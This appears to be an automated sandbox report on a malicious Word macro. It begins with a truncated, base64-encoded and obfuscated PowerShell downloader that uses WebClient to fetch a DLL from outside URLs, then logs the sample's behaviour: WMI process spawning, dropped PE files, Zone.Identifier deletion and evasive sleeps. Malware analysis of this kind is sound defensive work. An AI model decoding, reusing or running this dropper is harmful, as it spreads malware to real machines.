IAAgACQAaQBvAHgASwB5ADIAIAA9ACAAWwB0AFkAUABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIALQBmACcAcwBUAEUAbQAuAGkATwAuAGQAaQBSAGUAYwBUACcALAAnAHkAJwAsACcAUwB5ACcALAAnAE8AcgAnACkAIAA7ACAAcwBFAHQALQBJAHQAZQBNACAAIAB2AGEAUgBpAGEAYgBMAGUAOgAxADYAVgBKACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADYAfQB7ADcAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACcAVgAnACwAJwByACcALAAnAEkAYwBFAFAAbwBpAE4AJwAsACcATgBlAFQALgBTACcALAAnAFQAbQBhAE4AYQBHAEUAJwAsACcAZQBSACcALAAnAHMAWQBTACcALAAnAHQAZQBtAC4AJwApACAAKQA7ACQASwB0ADMAcwBiAG8AZwA9ACgAJwBCACcAKwAoACcAbQAnACsAJwB2ACcAKwAnAGsAawA5AHIAJwApACkAOwAkAE0AagA1AG4AcAB3AF8APQAkAFoAOQBsAHMANAB6ADYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEcAMwA1AHcANQAyADQAOwAkAFkAZAAwADgANQByAHgAPQAoACcAVQB4ACcAKwAoACcAZQBlACcAKwAnAF8AJwApACsAJwB3AGwAJwApADsAIAAgACgAIAAgAGcARQB0AC0AaQB0AEUATQAgACgAJwB2AGEAUgBJACcAKwAnAEEAYgBsAEUAJwArACcAOgAnACsAJwBJAG8AWABLAFkAMgAnACkAIAApAC4AVgBBAGwAdQBlADoAOgAiAEMAYABSAEUAYABBAFQAYABlAGAAZABJAFIARQBjAHQATwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEkARQAnACsAJwBjACcAKQArACcATwAnACsAKAAnAF8AJwArACcAdwBnAHEAJwApACsAJwB2ACcAKwAoACcANwAnACsAJwBJAEUAYwBDADAAMwAxACcAKQArACgAJwA2AGUAbQBJAEUAJwArACcAYwAnACkAKQAgAC0AYwByAEUAcABsAEEAYwBFACAAIAAoACcASQBFACcAKwAnAGMAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAKQA7ACQATQBsADIAOQA0ADYAOQA9ACgAJwBSACcAKwAoACcANgBqACcAKwAnAGsAdQB2AGUAJwApACkAOwAgACAAKAAgACAAVgBBAFIAaQBBAGIATABlACAAMQA2AHYAagAgACAALQB2AEEATABVAEUAbwBuACAAKQA6ADoAIgBzAEUAQwBgAFUAcgBpAHQAeQBwAGAAUgBvAFQAbwBgAGMAbwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABOAGkAbQBoAF8AdQB4AD0AKAAnAEgAZQAnACsAJwB6ACcAKwAoACcAZgB1ACcAKwAnADIAOQAnACkAKQA7ACQATQBlAG0AMAB1AHcAcgAgAD0AIAAoACcATAB5ACcAKwAoACcAZQB0ACcAKwAnAGEANgAnACkAKwAnAHUAZAAnACkAOwAkAEYAagBfAGkAbgB4AGkAPQAoACgAJwBWAHYAJwArACcAMwAnACkAKwAoACcAagBlAGcAJwArACcAOAAnACkAKQA7ACQARwB5AHoAZgA0AGcAOAA9ACgAKAAnAFEANQAnACsAJwA3AHEAdwAnACkAKwAnAGsAJwArACcAegAnACkAOwAkAEMAMAB3ADcAcgBvADYAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBPAF8AdwBnAHEAdgAnACsAJwA3ACcAKwAnAHsAMAAnACsAJwB9ACcAKwAnAEMAJwArACcAMAAzADEANgBlAG0AewAwAH0AJwApACAALQBmACAAWwBDAGgAQQByAF0AOQAyACkAKwAkAE0AZQBtADAAdQB3AHIAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABHAGIAMwBsAHkAawA4AD0AKAAoACcATQB4ACcAKwAnADEAZwAnACkAKwAoACcAZwAnACsAJwBvAG0AJwApACkAOwAkAFIAcAA1ADYAegByAGEAPQBOAEUAVwBgAC0ATwBiAGAASgBlAEMAdAAgAE4AZQBUAC4AVwBFAGIAQwBMAGkARQBuAHQAOwAkAEMAagA1AGsAdwBuAG0APQAoACgAKAAoACcAaAB0AHQAcAA6AHEAcQApACcAKwAnACgAcwAyACcAKwAnACkAKABxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAB6AGUAbgAnACsAJwBpACcAKQApACsAKAAnAHQAaABjACcAKwAnAGEAbQBwAHUAJwArACcAcwAuAGMAJwApACsAKAAoACcAbwAnACsAJwBtAHEAcQApACgAcwAyACcAKwAnACkAJwArACcAKABsAHEAJwArACcAcQApACcAKQApACsAKAAoACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAeQBRACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACgAJwAoAEAAaAB0AHQAJwArACcAcAAnACsAJwA6AHEAJwArACcAcQAnACsAJwApACgAcwAyACkAJwApACsAKAAoACcAKABxACcAKQApACsAK			Jump to behavior

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000905B push ecx; ret	7_2_1000906E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000E3C5 push ecx; ret	7_2_1000E3D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001BCE92 push cs; retf	7_2_001BCE94
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001FCE92 push cs; retf	10_2_001FCE94
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0030CE92 push cs; retf	11_2_0030CE94
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001CCE92 push cs; retf	13_2_001CCE94
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_001ACE92 push cs; retf	15_2_001ACE94
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_0020CE92 push cs; retf	18_2_0020CE94

Persistence and Installation Behavior:

Creates processes via WMI

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Drops PE files

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll

Jump to dropped file

Drops PE files to the windows directory (C:\Windows)

Source: C:\Windows\SysWOW64\rundll32.exe

PE file moved: C:\Windows\SysWOW64\Yozs\bhycn.bcx

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Yozs\bhycn.bcx:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Hxqt\iieutea.ehw:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Yjfs\gmxhcr.dhy:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Hszr\zft.hxn:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Vnjt\awo.cnn:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Dkpu\lbsvbo.gas:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Opqf\zrop.pvh:Zone.Identifier read attributes \| delete
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Blgp\gmlbr.kph:Zone.Identifier read attributes \| delete
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Mnrm\xmfd.ucf:Zone.Identifier read attributes \| delete
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Wnoc\mhxywle.szw:Zone.Identifier read attributes \| delete
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Xqby\jcrucsb.dql:Zone.Identifier read attributes \| delete
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Etxd\pkvco.wzp:Zone.Identifier read attributes \| delete
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Eiig\mmslr.ajj:Zone.Identifier read attributes \| delete

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_1000BA3C GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

7_2_1000BA3C

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Found evasive API chain (may stop execution after checking a module file name)

Source: C:\Windows\SysWOW64\rundll32.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2376

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 20_2_002075F0 FindFirstFileW,

20_2_002075F0

